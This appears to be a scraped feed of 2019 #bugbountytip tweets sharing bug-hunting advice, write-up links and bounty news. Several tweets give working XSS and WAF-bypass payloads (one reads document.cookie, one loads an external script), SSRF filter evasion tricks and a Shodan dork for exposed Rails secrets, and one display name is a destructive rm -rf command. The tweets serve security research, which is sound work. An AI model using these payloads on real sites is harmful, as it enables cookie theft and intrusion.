1 My toy project! I have now released the XSS scanning library. The name is "XSpear". It is a small and simple project, but I hope it any use well. (Probably a lot of bugs.......) Thx! https://t.co/RNeObHB3kz https://t.co/Xa4zLYKAEq #XSS #BugBounty #bugbountytip #Hacking #Ruby
Rob Fitzpatrick
@rpfitzpatrick


2019-07-19 15:05:57
0 I know it seems obvious. But Slack notifications for your bug hunting automation are a godsend. #bugbountytip https://t.co/4bpDFpwbbB
securibee 🐝
@securibee


2019-07-19 14:02:10
0 When in doubt, upload All The Things. https://t.co/towFxaHpke #bugbountytip #infosec
cybersecurity.wtf
@CyberSecWTF


2019-07-19 13:54:05
0 @Alra3ees Thanks for the share. Replicated in Lab with a ten-year-old subdomain. #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/FZVVCpl4YO https://t.co/xCLont0mcm
m0z
@LooseSecurity


2019-07-19 13:52:55
2 #bugbountytip #bugbounty #bugbountytips #infosec If a bounty program has upload servers in-scope, try uploading an SVG. Some endpoints might block it, but it doesn't mean they all do! SVGs can include HTML/JS and lead to stored XSS.
m0z
@LooseSecurity


2019-07-19 12:52:35
2 #bugbounty #bugbountytip #bugbountytips #infosec When doing a bug bounty always read previous reports. It helps you figure out what kind of issues existed in the application in the past and saves a lot of time on reconnaissance.
D3cy9h4
@DecyphaC


2019-07-19 12:23:53
2 They either think Google chrome is unhackable, or they taking their security serious??! But will be a result if we do find a bug #BugBounty #infosec #bugbountytip https://t.co/WJz2gAAT0V
ghost_rider_0x90
@gh0st_R1d3r_0x9


2019-07-19 10:00:47
0 Anyone ever encountered Regex based DOS vulnerability? I saw the vulnerable code but need help with POC. #BugBounty #bugbountytip #bugbountytips
kassih mouhssine
@KassihMouhssine


2019-07-19 09:43:09
0 New bug at @mailru i have bypass the filter and get a nice stored xss i get 150$ bounty but the problem here the payload just alert(1) nothing else :'( @Hacker0x01 #bugbounty #infosec #BugBountyTip https://t.co/8wPI0fBq0c
Ammar Amer
@cry__pto


2019-07-19 09:37:39
3 i have uploaded hundreds of articles about all field of the hacking science as a pdf files to my github repository. the updates will continue to arrive to the repository until it reach 2000 links & pdf files, at any time soon. https://t.co/q2layzVpKz #bugbountytip #OSINT #Malware
Sarvagya Sagar
@0ffensivemitthu


2019-07-19 05:15:22
5 -- "Fall in love with Regex" by Sarvagya Sagar https://t.co/bsRojqvuXy : This article won’t give you a magical power . Main purpose of this article is to serve as a first aid to newbies . [ #BugBounty #bugbountytip #infosec #CyberSecurity #bugbountytips #hacking #programmer ]
cybersecurity.wtf
@CyberSecWTF


2019-07-19 01:25:12
0 @HusseiN98D Congrats :) Always love that find. Replicated it in lab #bugbountytips #bugbountytip https://t.co/PEpNpJXjqr https://t.co/tJGRT2OJ3u
healthyoutlet
@healthyoutlet


2019-07-18 17:43:21
0 #bugbountytip the careers section of a website can leak information you might not find elsewhere. If they're looking to hire someone who has experience with some tech you didn't find during recon that might be a clue where else to dig.
cybersecurity.wtf
@CyberSecWTF


2019-07-18 14:45:45
0 @cnotin Oh damn. That's a good point. Thanks for sharing. I've made it available for practice in Lab https://t.co/W0YH06Fp6o #bugbountytip #appsec https://t.co/AmBsGsvy1Z
Sarvagya Sagar
@0ffensivemitthu


2019-07-18 05:41:54
0 [ #BugBounty #bugbountytip ] -- 💰 CRLF Injection Attack Video : https://t.co/5CFxKKosiG Writeup : https://t.co/ZO8QytNJ42 or https://t.co/MmKNu3hMau or https://t.co/rM8kZu6GHP Cheatsheet : https://t.co/EnybRyA7AA
ghostlulz
@ghostlulz1337


2019-07-18 03:55:59
1 Winner Winner Chicken Dinner. If you're not using the waybackmachine to find vulnerable endpoints you might be missing out on some bug bounty money. More info on my blog: https://t.co/IcaV2mPjQV #BugBounty #bugbountytip #bugbountytips #infosec #redteam #osint #waybackmachine
ph0rensic
@ph0rensic


2019-07-17 23:49:47
0 Shodan search RUBY DEBUG html:"secret_key_base" html:"rack.version" #bugbountytip #BugBounty
sagar yadav
@sagaryadav8742


2019-07-17 20:08:54
1 3rd bounty of this month 😊😊😊 It's time to plant some new trees 🌱 Secure_website and Secure-nature #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty https://t.co/fd60QKMJXj
SaadAhmed
@XSaadAhmedX


2019-07-17 17:40:54
2 Thinking of making a RECON web based tool using flask + python 😀 Need suggestion what you want in this tool please share ideas along reference 😉 #BugBounty #infosec #bugbountytip #bugbountytips
healthyoutlet
@healthyoutlet


2019-07-17 13:35:15
0 #bugbountytip There ARE bugs that haven't been found, just keep looking. https://t.co/dQmf6tzHbY
Sarvagya Sagar
@0ffensivemitthu


2019-07-17 13:30:41
3 [ #bugbounty #bugbountytip ] - HTML Injection 🔥 Intro : https://t.co/CVABpaoutF Video : https://t.co/p3EsNso7y3 Writeup : https://t.co/sZ6CGqcuW8 or https://t.co/wG9l0Bhh2v or https://t.co/TJZQdVe9dC or https://t.co/XXsHNAO8ob or https://t.co/o2MQEj5buw
Ishaq Mohammed
@security_prince


2019-07-17 13:19:12
3 If you have your input reflecting in a javascript variable simply close the context with </script> and start a new <script> tag for #xss thanks to @s0md3v @brutelogic for sharing thier awesome research on xss #xss #bugbountytips #bugbountytip #bugbounty https://t.co/DRtHXi4TFB
Evan
@evanricafort


2019-07-17 11:48:15
0 Fun #BugBountyTip: distribute your blind-XSS payload to any of your target and maybe one day it will fire up on their end if they will be having a end of quarter checking/validation :p
Samet ŞAHİN
@sametsahinnet


2019-07-17 11:46:41
0 A simple #BugBountytip about deep subdomain search : Google dork > site:*.*.target.com #BugBounty
Dhamu
@Dhamuharker


2019-07-17 07:16:51
1 #bugbountytip #bugbounty Story of my Biggest Bounty ever : Command Execution on Jenkin https://t.co/GtJFtgKw74
bl4de
@_bl4de


2019-07-16 19:52:17
1 Sometimes, when you run off the ideas, it's good to back to basics 😉 #bugbountytip #hacking #webappsec #WAHH @PortSwigger @DafyddStuttard https://t.co/zatsQY45MC
ΡRΛSΞUDΟ
@praseudo


2019-07-16 19:33:33
1 Some android hacking related #bugbounty #androidsecurity #androidhacking #infosec #bugbountytip https://t.co/agYj45YgSe
Dan Field
@Surfrdan


2019-07-16 18:41:43
0 @nahoragg @Hacker0x01 Nicely done! And great #bugbountytip in the thread. Monitoring is key with large scopes.
Leonel Emiliano
@leoalgare


2019-07-16 13:35:19
0 Yay, I was awarded a $700 bounty on @Hacker0x01! Reflected XSS + unrestricted CSP leads to account takeover. (High severity) Weaponize your xss payloads and show the real impact #bugbountytip #bugbountytips https://t.co/UA8jUEN1ss #TogetherWeHitHarder
cybersecurity.wtf
@CyberSecWTF


2019-07-16 12:24:22
0 @0xInfection Now available for practice in lab https://t.co/Zp8nolQIhq #bugbountytip https://t.co/1LyHcMD6JR
Shammah Agwor
@Zealsham


2019-07-16 12:20:56
0 If you query a Jira api endpoint and you are getting an empty result, try to find the jira login page of your target. A temporary session cookie will be given to you. You can use this to query the endpoint and get a valid result #BugBounty #bugbountytip
Brute Logic
@brutelogic


2019-07-16 11:41:15
2 Check this writeup! #XSS #bugbountytip https://t.co/BNFapWjYqg
Mads
@iGotRootBlog


2019-07-16 10:47:07
0 Reading manpages can teach you so much. Just found out you can get exploits from a XML nmap file through searchsploit Example with verbose flag for real time results: searchsploit -v --nmap nmapfile.xml Time to automate this? I think so! #bugbountytip #pentesting #bugbountytips
YS
@YShahinzadeh


2019-07-16 10:00:21
1 site-a has open redirect limited to site-b or x.site-a. The browser will keep the # of URL. site-a/?url=site-b/path#payload -> site-b/path#payload the same for x.site-a. You might take advantage of full redirect and stealing an auth token #bugbounty #bugbountytip
SaadAhmed
@XSaadAhmedX


2019-07-16 07:20:45
3 Here Is the Write-up how I use Click Jacking to exploit CSRF https://t.co/o3mNTG47U6 #bugbountytip #bugbountytips #bugbounty @Bugcrowd
Sarvagya Sagar
@0ffensivemitthu


2019-07-16 06:30:58
1 [ Capture Session Token ] wget -q --save-cookies=cookie.txt --keep-session-cookies --post-data="username: admin&password=pass&Login=Login" http://target/login.php #BugBounty #bugbountytip #bugbountytips #infosec 🌈
Shammah Agwor
@Zealsham


2019-07-16 00:45:23
0 Let’s not forget that @yaworsk started this whole streaming thing with his PRO TIPs series #BugBounty #bugbountytip
cybersecurity.wtf
@CyberSecWTF


2019-07-15 18:25:52
0 H1 top 15 most common vulnerabilities #appsec #bugbountytip https://t.co/wqsqrUeibX
Abugzlife
@abugzlife1


2019-07-15 14:33:12
6 New post about the not so special bugs out there. Hopefully this will help motivate beginners that are struggling to see the light at the end of the tunnel, and show some of the very simple, impactful bugs out there. https://t.co/Ti0DlwgYR8 #bugbounty #bugbountytip #infosec
[email protected]řķ Kňığhť
@eye100_eagle


2019-07-15 13:04:07
0 $500 000 Bug Bounty Campaign https://t.co/ZdytT3Pg8D #bugbounty #hackerone #bugbountytip #ItTakesaCrowd
Emre Selim
@emre_selim8


2019-07-15 10:02:03
0 I was 2th hacker at Hall of Fame of Ford in 3 days. How did i do this? 😋 #bugbounty #hackerone #halloffame #bugbountytip https://t.co/1rt3KpZCWs
Tismayil
@Tismayil1


2019-07-15 08:18:35
0 Good Weeks. #bugbountytip @Hacker0x01 https://t.co/xJfdyCvm5r
Wh11teW0lf
@Wh11teW0lf


2019-07-15 06:44:20
0 #bugbountytip Always visit Out of Scope subdomains and domains to get new endpoints for In Scope targets!
ghostlulz
@ghostlulz1337


2019-07-14 21:29:10
1 Do you like hacking? Do you like learning new offensive security techniques? Do you like making money with bugbounties? If so check this out: https://t.co/pAdnbe5VeU #BugBounty #bugbountytip #bugbountytips #infosec #redteam #dfir #Pentesting #hacking #hacker #osint #offsec
Th3G3nt3lman
@Th3G3nt3lman


2019-07-14 15:02:21
6 1) Amass one of the new target domains, nothing good 3) Search github and found a subdomain "k8s" 4) The site responded with K8s clusters names & details 5) Added the names to altdns wordlist, Run 6) 4 subdomains appeared & unauthorized access to K8s Dashboards 😅 #bugbountytip
bl4de
@_bl4de


2019-07-14 08:11:09
2 Here's why manual exploitation will always win with automated tools 😬 Also, here's the reason why you should read #bugbounty writeups Great catch by @h1_sp1d3r inspired by @gerben_javado post #hacking #itsecurity #bugbountytip #searchingforholes https://t.co/NipaLOv8D7 https://t.co/qrIF1uW6k8
Richard Strnad
@NateTheRiver


2019-07-12 13:37:29
0 Pretty useful when you forget to start some long-running scan via nohup command or in tmux/screen session. #bugbountytip #bugbountytips #Linux https://t.co/ofhPGEpzEv
Sarvagya Sagar
@0ffensivemitthu


2019-07-12 10:20:21
0 [ #BugBounty #bugbountytip ] - Cross site request forgery 💰 Video : https://t.co/0W0FfO385m Paper : https://t.co/IE1UEx1ApU or https://t.co/m3h6mYdblI Cheatsheet : https://t.co/FVweb3zDCG Writeup : https://t.co/RZg50gukWu or https://t.co/NwHDQOmKo8 or https://t.co/7SoDFPXLxN
Hussein Daher
@HusseiN98D


2019-07-11 22:31:03
0 What is your manual recon approach? Mine: -Github -Censys -Shodan -Google dorks -Bing search #bugbountytip #bugbountytips #bugbounty
Cyberthereaper
@Cyberthereaper3


2019-07-11 18:45:25
1 I earned 500$ for my Submission on HackerOne ❤ #Hacker0x01 ❤️ #hackerone ❤ #bugbountytip ❤ #infosec ❤
securibee 🐝
@securibee


2019-07-11 18:36:18
0 dedupe and sort your wordlist in place sort -u -o wordlist.txt wordlist.txt #bugbountytip #infosec
Ben Sadeghipour
@NahamSec


2019-07-11 15:30:34
6 Here's this weeks Bug Bounty Protip! If you have some tips you'd like me to share, send them my way and I may use them for in the future. More on my stream this Sunday at 10:00am PDT! #bugbountytip https://t.co/pnw3EFhVWO
HackIsOn ®
@hackison


2019-07-11 12:05:09
3 Cloudflare #WAF Bypass Just use {alert`1`} instead of alert(1). Any #XSS vector will work (except <script>). #BruteTips #bugbounty #bugbountytips #bugbountytip #Https #malware #vulnerability #webdev #CMS #opensource #Linux #API #infosec #DDoS https://t.co/MZNlWR8wGn
c0mr3x
@c0mr3x


2019-07-11 11:50:57
0 Found XSS in private bug-bounty .. document was filtered, so as () .. my final payload -> javascript:setTimeout`\x64ocument.write\x28\x64ocument.\x63ookie\x29` #bugbountytip #BugBounty
Petko D. Petkov
@pdp


2019-07-10 17:48:17
1 “If you set your goals ridiculously high and it’s a failure, you will fail above everyone else’s success.” — James Cameron #bugbountytip
SΛKYB
@sakyb7


2019-07-10 15:41:46
0 Here is writeup for an interesting Account takeover vulnerability. #bugbounty #bugbountytip #TogetherWeHitHarder https://t.co/aZe7EB0SYY
Tyrell Wellick
@TyrellWellick00


2019-07-10 15:15:14
0 Just found an app which keep its chat backup in plain text. @three_cube #bugbountytip #messaging #Hackers Pro tip : Always try to access the chat database of the messaging or chatting app you use. I was able to access the messages in the plain text. https://t.co/sq4n7wI2TV
Fisher
@Regala_


2019-07-10 08:59:14
0 It's that time of the year 🥳🙏 @Burp_Suite #bugbounty #bugbountytip https://t.co/pKonoklXxL
Touhid M Shaikh
@touhidshaikh22


2019-07-09 23:51:12
0 Subdomain Takeover Basic Understanding https://t.co/PcSPMI33IT #BugBounty #BugBountyTip #subdomain #basic https://t.co/Q3pNvsOwQH
Mike Lierman
@MikeLierman


2019-07-09 22:06:18
0 @0xInfection #infosec #bugbounty #bugbountytip What. No way. I didn't know this!
Nikos Gkogkos
@ngkogkos


2019-07-09 20:27:29
0 Email clients' browser engines are fascinating! Often you can control the layout of generated emails by messing with HTML/CSS. Example payloads to affect how emails render: <% <!-- <p style="display:none;" <div style="visibility:hidden"> #BugBounty #BugBountyTip #BugBountyTips
Ammar Amer
@cry__pto


2019-07-09 13:46:09
2 1500 link to awesome resources and the number will continue get higher until it reach 2000 link during the next few coming days. #BugBounty #Hacking #Malware #redteam #cybersecurity #infosec #pentest #BugBountyTip https://t.co/q2layzVpKz https://t.co/2XyhkruBx7
David Vieira-Kurz
@secalert


2019-07-09 09:41:19
0 Besides @Burp_Suite, CIRT nikto and nmap with NSE ... which other web security scanner would you recommend these days which costs max $500 pro year AND work on mac/linux? #infosec #BugBounty #BugBountyTip #bugbountytips
alias ls=' rm -rf /'
@spyerror


2019-07-09 06:53:23
0 Cloudflare XSS Bypass via add 8 or more superfluous leading zeros for dec and 7 or more for hex. Dec: <svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #Bypass #WAF #XSS #Cloudflare #BugBountyTip
Coding_Karma
@karma_coded


2019-07-08 21:38:01
0 That moment when you fuck around with APIs for PII leakage then find a file that has it all and no access control configuration chain with IDOR and BAM entire DB 🤯😂 #bugbounty #bugbountytip #infosec #security https://t.co/L4P8vfzTG2
securibee 🐝
@securibee


2019-07-08 19:59:27
0 https://t.co/kG7era7rGr analyze a chrome extensions risk before using it by @duo_labs be safe out there. #infosec #bugbountytip
Ammar Amer
@cry__pto


2019-07-08 17:34:47
1 Obtaining Login Tokens for an Outlook, Office or Azure Account. https://t.co/0uHH0nM2XI #BugBounty #bugbountytip
alias ls=' rm -rf /'
@spyerror


2019-07-08 17:05:29
0 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #BugBountyTip #WAF #Researcher #Bug #Security #BugBounty
Infected Drake
@0xInfection


2019-07-08 16:26:48
12 I learnt today that IP addresses can be shortened by dropping the zeroes. Examples: http://1.0.0.1 → http://1.1 http://192.168.0.1 → http://192.168.1 This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted. #infosec #bugbounty #bugbountytip https://t.co/2zcrLCmq0R
healthyoutlet
@healthyoutlet


2019-07-08 15:55:58
0 what's one of the lesser-known tools in your bug bounty arsenal? I'm not sure how many of you are using this one but I do a lot of API testing with postman https://t.co/SBo6D8qPKN #bugbounty #bugbountytip
bl4de
@_bl4de


2019-07-08 15:35:25
3 One of the best set of #bugbountytips ever, in one thread Read, learn, use daily and share with others #BugBounty #bugbountytip #hacking #PenTest #ITSecurity https://t.co/nL4Co2SBNs
Fisher
@Regala_


2019-07-08 15:18:28
2 Awesome thread of bounty tips by @pdp 🥳🥳🥳 #bugbounty #bugbountytip https://t.co/x48UW2of2G
Hussein Daher
@HusseiN98D


2019-07-08 12:47:18
2 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #BugBountyTip
alias ls=' rm -rf /'
@spyerror


2019-07-08 12:07:53
2 Another #Cloudflare #XSS #Bypass xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> #WAF #BugBounty #BugBountyTip
chouaib Hm
@chouaibhm


2019-07-08 10:55:49
0 Abusing PHP Query String parser bypass IDS/IPS/WAF #bugbountytip #infosec #Pentesting #BugBounty https://t.co/JdZbeT4GGt
David Vieira-Kurz
@secalert


2019-07-08 10:03:17
1 who else is attending Global AppSec - Amsterdam (September 23-27) this year? #infosec #BugBounty #bugbountytip
alias ls=' rm -rf /'
@spyerror


2019-07-08 07:51:27
0 While the money is still in the hands, in the near future, everyone will witness, although only a part will witness. #WAF #BugBounty #BugBountyTip #Cyber #Researcher
Ammar Amer
@cry__pto


2019-07-08 06:57:29
2 check out the new awesome resources in my repository.i had added 87 link to advanced resources to my github repository . and the number will reach 2000 link .at any time soon. #OSINT #Hacking #PenTest #redteam #malware #CyberSecurity #BugBountyTip https://t.co/q2layzVpKz https://t.co/EF7u0ghngC
incredincomp
@incredincomp


2019-07-08 04:07:45
2 Is the private IP scheme disclosure considered a bug or should I literally be trying to pivot to a different OSI layer(and if I cant, should I still report that I know how to find more info)? Obviously scope aware, just curious if anyone'd care. I would #bugbounty #bugbountytip
Michael Blake
@Michael1026H1


2019-07-08 03:12:43
0 #bugbountytip Need a redirect, maybe a 301 or 303? Use https://t.co/YyaeYQFrkP to get a quick URL. You can configure it using this guide https://t.co/jUbe32eeJq Great for SSRF.
Bug Bounty TuT
@BugTut


2019-07-07 20:10:49
0 Guide 001 |Getting Started in Bug Bounty Hunting.. Start Bug Bounty 1st To Last.. Thanks To @KHIZER_JAVED47 Article Link:- https://t.co/CrabN9jmjz #BugHunting #BugBounty #BugBountyTip #bugbountytips https://t.co/DL2zcol7CI
Amit Dubey
@MrR0Y4L3


2019-07-07 15:59:16
0 Burp suite extensions which I found quite useful - 1. ActiveScan++ 2. Knife (https://t.co/C9kkI166eA) 3. SSLScan 4. AutoRepeater 5. Software Vulnerability Scanner 6. Logger++ 7. ErrorMessageCheck Suggestions are welcome :) #burpsuite #pentest #infosec #BugBountyTip #bugbounty
Nikos Gkogkos
@ngkogkos


2019-07-07 14:03:11
0 If you are like me, running hundreds of #gobusters, you may find this #bash function useful, it cats X most recent output files. Assumes all output is under CWD, & "may" work w/ mixed output files. Grep by "Found:", length.. See comments for code. #BugBountyTip #pentest #infosec https://t.co/dsy0tuX2Yq
Hussein Daher
@HusseiN98D


2019-07-07 13:47:43
4 An overview of what I did for my recent $10 000 bug. Always go for the highest impact! #bugbounty #bugbountytips #bugbountytip https://t.co/DnHxbneXuN
Nikos Gkogkos
@ngkogkos


2019-07-07 13:34:20
0 If you are like me, running hundreds of #gobusters, you may find this #bash function useful, it cats X most recent output files. Assumes all output is under CWD, & "may" work w/ mixed output files. Grep by "Found:", length.. See comments for code. #BugBountyTip #pentest #infosec
Sarvagya Sagar
@0ffensivemitthu


2019-07-07 12:34:01
1 [ My Blog Post #02 ] -- Repost : Read this , Definitely you'll fall in love with Regex : “Fall in love with Regex” by Sarvagya Sagar https://t.co/7a9Cd89oXR 🌈 #BugBounty #bugbountytips #BugBountyTip #infosec #infosec19 #CyberSecurity
Securisec 🚀
@securisec


2019-07-07 04:16:41
0 "RT RT 0ffensivemitthu: [ #BugBounty #BugBountyTip ] -- 💰 HTTP Parameter Pollution Intro : https://t.co/OKBqqZF4Bj Slide : https://t.co/VEBRb0yY4N Writeup : https://t.co/ztjLNd2OAO or https://t.co/Zn2HnUb3KO Report : https://t.co/oiTVmyXxKn or https://t.co/PSDeo1D7dM 🌈"
Ammar Amer
@cry__pto


2019-07-07 00:13:09
2 and now there is 1300 link to important resources in the world of hacking. check out the new links about redteam,exploit development ,oscp,,etc. #BugBountyTip #Hacker #infosec #exploitation https://t.co/ldxTY0MZIt https://t.co/PF1Q8znOCz
Ammar Amer
@cry__pto


2019-07-06 18:19:06
1 Server-Side Request Forgery (SSRF) vulnerability on https://t.co/fOlTXYOTDJ: https://t.co/GXSRfRqpAP #BugBountyTip #BugBounty
Sarvagya Sagar
@0ffensivemitthu


2019-07-06 11:16:50
3 [ My Blog Post #01 ] -- Repost , My first blog post . 💰 "Hunt Unvalidated Url Redirects in wild” by Sarvagya Sagar https://t.co/wzsdk1bURQ #BugBountyTip #bugbountytips #BugBounty #infosec #infosec19 #CyberSecurity #infosecurity
Sarvagya Sagar
@0ffensivemitthu


2019-07-06 10:45:25
1 [ #BugBounty #BugBountyTip ] -- 💰 HTTP Parameter Pollution Intro : https://t.co/RGUfzyX8ZU Slide : https://t.co/zjSdRsojm4 Writeup : https://t.co/WGU4ctF86X or https://t.co/QC3kdoISbR Report : https://t.co/TIK43b00zX or https://t.co/GsmuDR1DLa 🌈
alias ls=' rm -rf /'
@spyerror


2019-07-06 10:20:10
0 Cloudflare #XSS #Bypass via dot 1'"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
Ammar Amer
@cry__pto


2019-07-06 00:52:12
1 new links were added to the repository . about OSCP and Advanced google hacking technique and dorks for various attacks. check it out. the number of the links now 1271 and it will get higher everyday. #BugBountyTip #Hacking #infosec #OSINT https://t.co/q2layzVpKz https://t.co/6hsjupaauu
Ammar Amer
@cry__pto


2019-07-05 22:14:51
3 new links were added to the repository . check it out.the number of the links now 1225 and it will get higher everyday. #BugBountyTip #Hacking #infosec #redteam #CyberSecurity #bugbounties https://t.co/q2layzVpKz https://t.co/T0xtpz7hUK
Fisher
@Regala_


2019-07-05 22:00:07
3 https://t.co/iKUQ75PaLI - @ngalongc highlights why you should always read the documentation when hunting on a program. And also kudos for @yaworsk and @ShopifyEng for triaging even being a "hypothetical" #bugbounty #bugbountytip
Sparsh Kulshrestha
@d0tdotslash


2019-07-05 20:10:24
0 @NahamSec @yappare I usually try #BugBountyTip when searching for random tips and tricks.
Mehmet Aura
@rootaura


2019-07-05 19:59:15
0 I released my tool which name is "BountyBot" It checks unclaimed social media accounts which linked on page etc etc. (by the way im new at py) https://t.co/VKBHPVlzcD #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd https://t.co/teDQJ4Kf1h
Jatin
@techyfreakk


2019-07-05 18:25:10
7 For shortening Linux commands, you can use the alias command As an Example, alias nmapq="nmap -Pn -T4 -A" Now just run nmapq $target Add it to /home/user/.bashrc, and you're good to go 🙂 #linuxtip #bugbountytip
Samet ŞAHİN
@sametsahinnet


2019-07-05 17:42:15
1 How to steal #CSRF Tokens with simple #XSS vulnerability ? https://t.co/140rJjo5Nt #BugBountytip #bugbounty #infosec #hacking #TogetherWeHitHarder
architect
@architectt1


2019-07-05 14:13:30
0 Re-exploited Open Redirect on a private program where I reported that and got a bounty for it not so long ago. Always try other strategies once a report has been resolved. #bugbountytip #bugbounty #infosec #security
CaptainFreak
@0xCaptainFreak


2019-07-05 13:40:52
0 Learn about ZAP @zaproxy from this video if you use Burp extensively and find ZAP UI intimidating. Also the HUD feature👌, Awesome stuff @Bugcrowd @david_scrobonia https://t.co/nJ1IDtgBWE #bugbountytip
Dhaval Panchal
@cedhaval02


2019-07-05 06:53:04
0 @Divya_Bhaskar Hey, recently i checked out your website and i seen some bugs point that i have attached in below..have a good day to all :) #news #bugbountytip https://t.co/6Iqidefm2y
Sarvagya Sagar
@0ffensivemitthu


2019-07-05 05:58:19
0 [ #BugBounty #bugbountytip ] -- 💰 Open redirects Video : https://t.co/kwvNvWlelM or https://t.co/2ggZiuHoN5 Writeup : https://t.co/fbZ4b2H9eu or https://t.co/wzsdk1bURQ Reports : https://t.co/OuP4nBeJOo or https://t.co/mk1I69zu6k Cheatsheet : https://t.co/yQSgrOPjVt 🌈
Bohdan Korzhynskyi
@h1_ragnar


2019-07-04 22:01:43
8 Cloudflare #XSS #Bypass via dot 1'"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
Bohdan Korzhynskyi
@h1_ragnar


2019-07-04 21:15:37
0 Cloudflare #XSS #Bypass via dot '"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
vavkamil
@vavkamil


2019-07-04 20:37:31
0 Just launched v1.0 of https://t.co/jZS6PtN22C ~ Latest bug bounty related tweets ~ #bugbountytip
HackIsOn ®
@hackison


2019-07-04 14:58:57
1 “Account Takeover Using CSRF(json-based)” by shub rathore https://t.co/4Obn65Bode #bugbountytip #bugbounty
Dawood Ikhlaq
@daudmalik06


2019-07-04 13:49:28
1 Just Bypassed Custom Firewall with URL encoding technique: Final Payload: %253%63svg%2520onload=alert(1)%253%65 the firewall was blocking "%253c", Trick: %25 3 %63 -> when the app decoded it, it become %3c -> app decoded it again and it become < and got alert #bugbountytip
$!|3nt_4unt3r
@shub66452


2019-07-04 11:31:04
58 My first blog #bugbounties #bugbountytip https://t.co/scMySo36WD
Neolex
@NeolexSecurity


2019-07-04 10:32:15
0 Hey guys, I have an XSS that works on IE/Edge due to the non-encoding of the url. There is a way to make it work on firefox/chrome ? #bugbounty #bugbountytip
darkmage
@therealdarkmage


2019-07-04 02:16:25
0 TIL that %c2%a0 can be used to overcome XSS defenses. #BugBounty #bugbountytip #bugbountytips
David Alison
@Nokibulislam1


2019-07-04 01:26:22
1 #BugBountyTip: Have a char limit for XSS? See if it’s appended with other fields (first + last name). You can then split the payloads (this case needed JQuery to load ext script): FirstName: “><svg/onload=“$.getScript(‘http://‘+ LastName: ‘https://t.co/fSzBPqvWxY’)..” #bugbounty
Arif Khan
@payloadartist


2019-07-03 20:05:26
29 Common Android #security vulnerabilities #bugbounty #bugbountytip https://t.co/ZnNDzj51o9
Petko D. Petkov
@pdp


2019-07-03 17:56:05
1 The real impact of a vulnerability is measured by its potential - not just the current impact but future impact as well. Real attackers can sit on a vulnerability for years. #bugbountytip
Yash Sodha 🌟
@y_sodha


2019-07-03 17:53:31
13 #BugBountyTip: Always remember to check emails for access control issues. Sometimes the same access control is not applied when sending emails. Thanks @gitlab for the bounty! https://t.co/sqzqBCph6F
Siva krishna
@le4rner


2019-07-03 16:21:43
54 I don't know why and how this bypassed cloudflare. But here it is javascript:{ alert`0` } @rodoassis @s0md3v @akhilreni_hs #bugbountytip #xssbypass PS: Pros are welcome to give your insights about this.
Abugzlife
@abugzlife1


2019-07-03 15:41:43
16 #BugBountyTip: Have a char limit for XSS? See if it’s appended with other fields (first + last name). You can then split the payloads (this case needed JQuery to load ext script): FirstName: “><svg/onload=“$.getScript(‘http://‘+ LastName: ‘https://t.co/WKmfmkNmNp’)..” #bugbounty
soaphorn seuo
@soaphornseuo


2019-07-03 10:23:09
5 [ #BugBounty #bugbountytip ] -- Cracking the Lens : Paper : https://t.co/ydXjQUxyVY Video : https://t.co/qerJ8DXT5g or https://t.co/twNLJFmczy Writeup : https://t.co/skBYPKjlUP Report : https://t.co/oblok1GZic
Morphine 'Ashraf'
@m0rph1n3e


2019-07-03 08:47:08
5 #bugbountytip #bugbounty #triagertip #bugbountytips #infosecurity #infosec I've found a reflective xss vulnerability, but it only works in IE, and Edge browser. Any idea, how to exploit it in the other web browsers using HTML file or directly by visiting the vuln endpoint?
Garth Humphreys
@garthhumphreys


2019-07-02 22:48:56
3 I think consistency is important in anything you do, especially with #infosec and #bugbounty - Consistently keep pushing to #learn more and #try harder, even if it's one line of code a day 🙂 #bugbountytip #bugbountytips
Alejandro Parodi
@SecSignal


2019-07-02 20:04:10
17 #BugBountyTip If you can't use quoted strings in your XSS payload, try to use regex functions that return strings! For example: t.setRequestHeader(([]+/Content-Type/g).substr(1,12),(([]+/application/g).substr(1,12)+([]+/json/g).substr(1,4)) Also, + can be %2b ;) #WAF #BugBounty
Fisher
@Regala_


2019-07-02 17:01:51
12 Ayyyy! Got featured on the latest hacking newsletter by @PentesterLand 🥳 Have a look and show some love, this person has been doing an amazing job on collecting, sharing resources and putting content out there for all BB fellows ❤️ #bugbounty #bugbountytip https://t.co/NEcoXNaZSL
Cade
@persian_mh17


2019-07-02 15:36:02
4 Enumerate websites that are accessible through HTTP/HTTPS (Specifically), in other words it can identify live websites for further testings #recon #bugbountytip https://t.co/LwB0soe7Y7
eForensics Magazine
@eForensics_Mag


2019-07-02 14:43:00
6 Bug Bounty Methodology (TTP- Tactics,Techniques and Procedures) V 2.0 | By Sanyam Chawla https://t.co/IF6mmn6OcE #bugbounty #bugbountyhunter #bugbountytip #bugbountyhunting #cybersecurity #digitalforensics
Ismail Tasdelen
@ismailtsdln


2019-07-02 04:23:11
5 If you have a web subdomain list in your hand and you want to capture them. A app that may be useful to you. 😎 --> https://t.co/XAqQJ91Tck #bugbountytip #bugbounty #websecurity
Fisher
@Regala_


2019-07-01 15:07:40
2 Did you know... triagers try to escalate your reports before handing them to the company? 😳💰 Show some love for them #bugbounty #triagertip #bugbountytip
[email protected]
@k3va1


2019-07-01 14:01:55
5 #bugbountytip When you get path from where files are downloading remove file from url and run dirsearch with @Jhaddix's all.txt you will get juicy info
Petko D. Petkov
@pdp


2019-07-01 09:53:46
1 This new tool allows you to discover secrets at hyper-scale. #bugbountytip #bugbountytips #cloudflare https://t.co/jXFuNyxVlK
SaadAhmed
@XSaadAhmedX


2019-07-01 08:15:27
88 Here the write-up of IDOR https://t.co/3haNz2hZfa #bugbountytip #bugbountytips #bugbounty @Bugcrowd
Sarvagya Sagar
@0ffensivemitthu


2019-07-01 08:10:32
